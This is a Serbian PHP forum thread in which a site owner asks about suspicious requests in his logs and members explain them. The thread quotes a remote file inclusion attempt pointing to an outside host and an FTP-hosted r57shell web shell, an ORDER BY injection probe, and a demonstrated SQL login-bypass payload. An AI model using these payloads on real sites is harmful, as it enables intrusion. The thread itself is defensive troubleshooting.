• Naslovna
• FAQ
• Pravilnik
• O ES-u
• Tim
• Korisnici
• Statistike

 

• elitesecurity ::
• elitemadzone ::
• EMAIL ::
• RSS ::
• ES Mobile

  Niste ulogovani?  Username :   Password:   

• Registracija
• Zaboravili ste password?
• Flashback ▲▼
• Login problem?

 

Pretraga:

 

Srodne teme 14.04.2024. Re: Gde je Kejt? (samo pogrešni odgovori) 02.07.2004. Redizajn sajta u PHP-u 21.11.2007. Koja skripta mi treba za pretragu sajta 02.10.2006. Akademija Za Nacionalnu Bezbednost 11.05.2007. SEO za PHP stranice? 12.05.2007. Izrada Web Sajta!!! 09.08.2007. Potreban PHP/MySQL developer i web dizajner (jedn.. 07.11.2008. Php MySQL problem! 07.05.2010. MySQL PHP problem 06.03.2008. Potreban PHP programer za izradu sajta 500E Navigacija Brisanje liste Aktuelne teme u ovom forumu: Problem sa translate.google.com/transl.. Centralizovana autorizacija korisnika SOAP WEB servisi Agencije za privredne.. konfiguracija limesurvey za slanje poz.. Problem oko jednostavnog query baze Problem sa učitavanjem slika i videa .. restrikcija pristupa samo na index.htm.. Count _POST prilikom prihvatanja submi.. Hitna pomoc ne radi mi veza php - mzsq.. Automatizovani web servis Kreiranje MIDI iz PHP preg_replace - ne uspevam multi line :( Skripta za zakazivanje termina u PHP Problem sa multi replace Problem Upload Image ! Izaberite forum: Linux Linux aplikacije Linux desktop okruženja Linux hardware Windows desktop Windows aplikacije Zaštita Office Windows drajveri Office :: Word Office :: Excel Macintosh Mac hardware Mac software Iphone Enterprise Networking SOHO Networking Wireless Windows mreže Linux mreže Wireless :: WiMax Wireless :: Mikrotik Wireless :: Wireless oprema Linux/UNIX serveri i servisi Unix BSD Skript jezici Security Virtualizacija Cloud Computing Services Security :: Kriptografija i enkripcija .NET 3D programiranje Art of Programming Asembler C/C++ programiranje Kernel i OS programiranje Pascal / Delphi / Kylix Java Embedded sistemi Perl PHP Python Visual Basic 6 Veštačka inteligencija Security Coding XML GameDev - Razvoj Igara Ostali programski jezici PHP :: PHP za početnike PHP :: Smarty template engine .NET :: .NET Desktop razvoj .NET :: ASP.NET .NET :: WPF Programiranje C/C++ programiranje :: C/C++ za početnike Baze podataka MySQL Oracle Access MS SQL Firebird/Interbase PostgreSQL Fiksna telefonija VoIP Udruženje korisnika teleko.. GSM - telefoni GSM - upotreba GSM - servisiranje Mreže i novosti Smartphone Mreže i novosti :: Mobilni internet Mreže i novosti :: Telenor - korisnički servis Mreže i novosti :: VIP - korisnički servis Mreže i novosti :: MTS - korisnički servis Smartphone :: Symbian OS Smartphone :: Windows Mobile Smartphone :: Android GSM - telefoni :: Nokia PDA Uređaji GPS Portable Players Anonimnost i privatnost ISP Browseri E-mail Instant Messaging FTP Google Hosting ISP :: Wireless mreže i ISP ISP :: ADSL E-mail :: Anti-spam Instant Messaging :: IRC Hosting :: Domeni Google :: Gmail E-Marketing Web aplikacije Web dizajn i CSS Web dizajn softver Web razvoj Pretraživači i SEO Flash Javascript i AJAX Web dizajn i CSS :: Kritike Grafički dizajn Izdavaštvo 3D modelovanje Rasterska grafika Vektorska grafika 3D modelovanje :: CAD/CAM Matične ploče, procesori .. Video karte i monitori Storage Ostali hardver Overclocking & Modding PC Konfiguracije Laptopovi Vodič za kupovinu - PC har.. Tablet PC Muzička produkcija Audio kompresija Audio softver Video produkcija Video kompresija Video softver Multimedijalni uređaji Digitalni fotoaparati Digitalne kamere Home Theater Digitalni fotoaparati :: Fotografija Digitalni fotoaparati :: Vodič za kupovinu - Digita.. Elektronika Elektrotehnika Elektronika :: TV uređaji Elektronika :: Radio elektronika i tehnika Elektronika :: Mikrokontroleri Elektronika :: Audio-elektronika Auto-elektronika :: Tuning Vodič za učenje Vodič za posao Vodič za emigraciju Fizika Matematika Nauka Sertifikati Informatika Vodič za učenje :: Seminarski radovi Vodič za učenje :: Obrazovne institucije Vodič za emigraciju :: Život u USA Vodič za emigraciju :: Život u Norveškoj Vodič za emigraciju :: Život u Nemačkoj E-Poslovanje E-Kupovina IT pravo i politika razvoja IT događaji IT berza poslova IS i ERP Ekonomija Berza Cryptocoins IT berza poslova :: Arhiva IT berze poslova IT pravo i politika razvoja :: Registar Nacionalnog ID E-Poslovanje :: E-Transakcije E-Poslovanje :: Forex E-Kupovina :: Platne kartice Digitalna Televizija Advocacy Ankete Predlozi i pitanja Vesti Čekaonica Vesti :: ES leto manifestacija MadZone TechZone Poljoprivreda AutoZone MotoZone Svakodnevnica Video igre MadZone :: Zanimljivi linkovi MadZone :: Kultura TechZone :: Ergonomija TechZone :: Grejanje TechZone :: Klimatizacija TechZone :: Bela tehnika AutoZone :: Fiat Panda club Lista poslednjih: 16, 32, 64, 128 poruka.

Phikret Fikret Pašović freelancer Novi Pazar - Beograd Član broj: 192541 Poruke: 71 91.148.95.* Sajt: www.mojestudije.info +2 Profil Bezbednost PHP sajta 20.03.2010. u 20:35 - pre 171 meseci Pregledajući log pristupa sajtu video sam nekoliko pristupa sa ubačenim delovima koda u QUERY STRING. Jedan izgled QS je sličan ovom dole: www.imesajta.com?news.php?///?_SERVER[DOCUMENT_ROOT]=http://xxxx.xxxx.xxx.fr/media/id1??? Drugi QS je bio: www.imesajta.com?news.php?id=15%20order%20by%201- Šta ovime može da se postigne? Mislim da sam bezbedan ono što sam ja mogao da vidim, ali me interesuje da li sam nešto propustio da proverim. Probao sam te QS-ove i sajt se ponaša predviđeno - dakle odbija da prikaže nešto što ne bi trebao. http://www.mojestudije.info Svako ima pravo da se kreće i da bude kreten Odgovor na temu

mls Član broj: 210388 Poruke: 64 *.adsl-3.sezampro.yu. +3 Profil Re: Bezbednost PHP sajta 20.03.2010. u 20:57 - pre 171 meseci Upravo ovih dana pokusavam da se zastitim od potencijalnih upada po principu sql injection. Verovatno vec znas, ali ipak cu pomenuti (mozda neko ko cita nije upoznat) jedan primer kako se moze zloupotrebiti post i get u kojima stoje parametri za upit ka bazi. Recimo logovanje korisnika. Unosi se username i pass, zatim se stingovi ubacuju u query. $query = "SELECT * FROM users WHERE username='$username' AND password='$password'"; Cilj je da nakon username postoji nastavak koji ce omoguciti OR ''=''. Na taj nacin nista jednako nista vraca svakako true ili num_rows veci od nula (dobro je staviti ako je jednak jedan jer se i ocekuje samo jedan takav korisnik) sto je uglavnom uslov koji se pokusava ispuniti u sledecih nekoliko linija. Dakle unosenjem za password: Code: ' OR ''=' Dobija se sledece: Code: $query = "SELECT * FROM users WHERE username='pera' AND password='' OR ''=''"; Varijacija ima mnogo i sve imaju isti ili slican cilj, a to je da urade nesto za sta korisnik nije autorizovan. Resenje je da koristis funkcije kao sto su stripslashes i mysql_real_escape_string (mozda jos neke?). Pregledaj sta se izvrsava tamo gde je upucen order itd. Konkretno sa ovim ORDER BY mislim da nista znacajno nije postignuto osim mozda ispipavanja.. Odgovor na temu

Ivan.Markovic Član broj: 97763 Poruke: 330 Sajt: security-net.biz +19 Profil Re: Bezbednost PHP sajta 21.03.2010. u 09:16 - pre 171 meseci @Phikret Verovatno je neko pustio neki automatizovani skener koji isprobava gomilu eksploita u cilju pronalazenja nekog koji radi kod tebe. @mls Za sve sto ide u query obavezno koristi mysql_real_escape_string a ne stripslashes/addslashes: http://shiflett.org/blog/2006/...ersus-mysql-real-escape-string “If you think you are too small to make a difference, try sleeping with a mosquito.” - Dalai Lama XIV Odgovor na temu

Phikret Fikret Pašović freelancer Novi Pazar - Beograd Član broj: 192541 Poruke: 71 109.106.236.* Sajt: www.mojestudije.info +2 Profil Re: Bezbednost PHP sajta 21.03.2010. u 13:20 - pre 171 meseci mls znam za SQL injection ali ovo što je pokušano u prvom QS-u nije SQL injection, dok u drugom jeste. Baš me interesuje za prvi slučaj u kojoj situaciji bi upalilo i šta bi se time postiglo. Znači, on pokušava da postavi vrednost ?_SERVER[DOCUMENT_ROOT] promenljive na svoj domen. Kada bi mu to prošlo, desilo bi se na primer, pošto on pretpostavlja da ja u svom kodu pozivam tu promenljivu i formiram neki link, u stvari linkujem na njegov sajt? E sad me interesuje, kako uopšte može na ovaj način da postavi vrednost promernljive ?_SERVER[DOCUMENT_ROOT] i šta mu znače tri slasha na početku? Malo sam želeo da izanaliziramo ovu vrstu napada kako bih znao na šta sve da računam prilikom planiranja odbrambene strategije za moje sajtove :). Ivane, kasnije ću da pročitam ovaj članak koji si naveo u vezi sa mysql_real_escape_string. Pozdrav http://www.mojestudije.info Svako ima pravo da se kreće i da bude kreten Odgovor na temu

Phikret Fikret Pašović freelancer Novi Pazar - Beograd Član broj: 192541 Poruke: 71 82.117.198.* Sajt: www.mojestudije.info +2 Profil Re: Bezbednost PHP sajta 28.04.2010. u 13:26 - pre 170 meseci Ponovljeni su napadi ali sad na ovaj nacin. Dakle posto se na sajtu prosledjuje id vesti (www.imesajta.com/news.php?id=idnews) video sam da sam dobio query string ovakvog oblka www.imesajta.com/news.php?id=ftp://sportfitnessacademia.com.br:[email protected]/reser.php? Ovaj fajl reser.php moze da se preuzme. To sam i uradio i evo sta je u njemu. P.S. Nadam se da necu nesto da zeznem ako ga uploadujem, promenio sam ekstenziju u .txt. Primetio sam da mi se u rootu sajta nalaze dva fajla. rshed21.jpg i rshed21.html. Ovaj rshed21 redirektuje na neki sajt koji prodaje vijagre i ostala sranja. To sam primetio pre dva dana i rucno sam brisao fajlove. Nisam jos uvek promenio FTP sifru i primecujem da se svakog dana ti isti fajlovi ponovo pojave. Na brzinu sam pregledao kod php i js fajlova na sajtu i nisam nasao nista sumnjivo. Ocigledno je da je dosao do moje FTP sifre? E sad tu mi je misterija. Prosli put sam u total commanderu imao snimljene sve FTP konekcije i onda mi se na svim sajtovima pojavio onaj js kood o kome je pricano prije 4 ili 5 meseci ovde na ES-u. Nakon toga sam promenio sve FTP sifre i postavio master password na naloge i nisam imao problema. Pre mesec dana sam poceo da koristim FileZilla i tamo imam snimljene 3 FTP konekcije ka tri sajta i nije mi se ni na jednom sajtu pojavila ov dva fajla osim na jednom. Zbog toga pretpostavljam da nije dosao do FTP sifara preko FTP klijenta, jer da je dosao do jedne sifre, dosao bi i do ostalih ubacio bi fajlove u sve sajtove? edit 28.apr 2010.: Fajl sam otkacio [Ovu poruku je menjao Phikret dana 29.04.2010. u 10:04 GMT+1] http://www.mojestudije.info Svako ima pravo da se kreće i da bude kreten Odgovor na temu

_korso_ Član broj: 82797 Poruke: 163 *.adsl-a-2.sezampro.yu. +1 Profil Re: Bezbednost PHP sajta 28.04.2010. u 14:09 - pre 170 meseci Avast prijavljuje trojanca... Odgovor na temu

Miroslav Ćurčić ex mVeliki Novi Sad Član broj: 19034 Poruke: 1118 *.adsl.eunet.rs. +19 Profil Re: Bezbednost PHP sajta 29.04.2010. u 08:49 - pre 170 meseci To ti je hakerski alat r57shell, sklanjaj ga odatle. "The quieter you become, the more you are able to hear." Blog | PowerCMS Odgovor na temu

Phikret Fikret Pašović freelancer Novi Pazar - Beograd Član broj: 192541 Poruke: 71 82.117.198.* Sajt: www.mojestudije.info +2 Profil Re: Bezbednost PHP sajta 29.04.2010. u 09:01 - pre 170 meseci Otkacio sam fajl. Dobro, jel moze sad neko da objasni sta je u osnovi tog alata, kako radi i kakve rupe koristi? http://www.mojestudije.info Svako ima pravo da se kreće i da bude kreten Odgovor na temu

Miroslav Ćurčić ex mVeliki Novi Sad Član broj: 19034 Poruke: 1118 *.adsl.eunet.rs. +19 Profil Re: Bezbednost PHP sajta 29.04.2010. u 09:39 - pre 170 meseci To ti je kao da ti je neko instalirao TotalCommander na sajt pa ti razgleda datoteke, briše ih i upload-uje nove. "The quieter you become, the more you are able to hear." Blog | PowerCMS Odgovor na temu

Phikret Fikret Pašović freelancer Novi Pazar - Beograd Član broj: 192541 Poruke: 71 82.117.198.* Sajt: www.mojestudije.info +2 Profil Re: Bezbednost PHP sajta 30.04.2010. u 15:46 - pre 170 meseci Miroslave, hvala na informacijama. Samo da napomenem, da taj fajl nije na mom sajtu vec prosledjen kroy URL, pa zbog toga me interesuje kako to moze da se iskoristi i sta se time uopste postize (time sto putanju do tog fajla prosledi preko URL-a koga sam dao prethodno). Ovo sto sam u prethodnom postu rekao 'otkacio sam fajl' mislio sam na to da sam ga otkacio sa elitesecurity http://www.mojestudije.info Svako ima pravo da se kreće i da bude kreten Odgovor na temu

Miroslav Ćurčić ex mVeliki Novi Sad Član broj: 19034 Poruke: 1118 *.adsl.eunet.rs. +19 Profil Re: Bezbednost PHP sajta 30.04.2010. u 21:53 - pre 170 meseci Napadač se nadao da će tvoj sajt preko ....news.php?id=ftp://.... preuzeti tu datoteku kod sebe, pa će ovaj kasnije probati da je pronađe gde si je snimio i da je pokrene. Ako sajt nije download-ovao to onda si miran. Problem nastane kad se takve skripte nekako nađu na tvom sajtu, a napadač zna putanju gde su snimljene. "The quieter you become, the more you are able to hear." Blog | PowerCMS Odgovor na temu

Phikret Fikret Pašović freelancer Novi Pazar - Beograd Član broj: 192541 Poruke: 71 ...148.91.adsl.dyn.beotel.net. Sajt: www.mojestudije.info +2 Profil Re: Bezbednost PHP sajta 02.05.2010. u 09:34 - pre 170 meseci Aha, znači to je fora! HVala Miroslave. Iako mi još uvek nije najjasnije kako može neko da očekuje da će moj sajt da preuzme taj fajl? Mislim, koji bi bio scenario da mu to pođe za rukom? Verovatno ako bih u tom id-u iza news.php?id=... prosledjivao putanju do fajla koji treba preko FTP-a da se preuzme?Ali opet, niko ne bi ostavio ba[ toliku rupetinu, valjda bi prethodno izvršio neke provere nad fajlom koji se preuzima... http://www.mojestudije.info Svako ima pravo da se kreće i da bude kreten Odgovor na temu

milos.z Član broj: 246338 Poruke: 59 109.106.237.* Sajt: chaossecurity.wordpress.c.. +3 Profil Re: Bezbednost PHP sajta 03.05.2010. u 16:25 - pre 170 meseci u php.ini allow_url_fopen = off allow_url_include = off i to bi resilo malo zaobislo ovaj problem... takodje ovaj r57 shell je backdoorovan (salje mail obavestenja na [email protected]) trebalo bi da pogledas skripte koje se vrte na tvom serveru (news.php) mozda ti u daljem otkrivanju ovih php shell-ova pomogne: http://www.elitesecurity.org/t387225-phpAV-php-cli Free your mind and the ass will follow! Chaos Security | Exploits | phpAV-v1.1 Odgovor na temu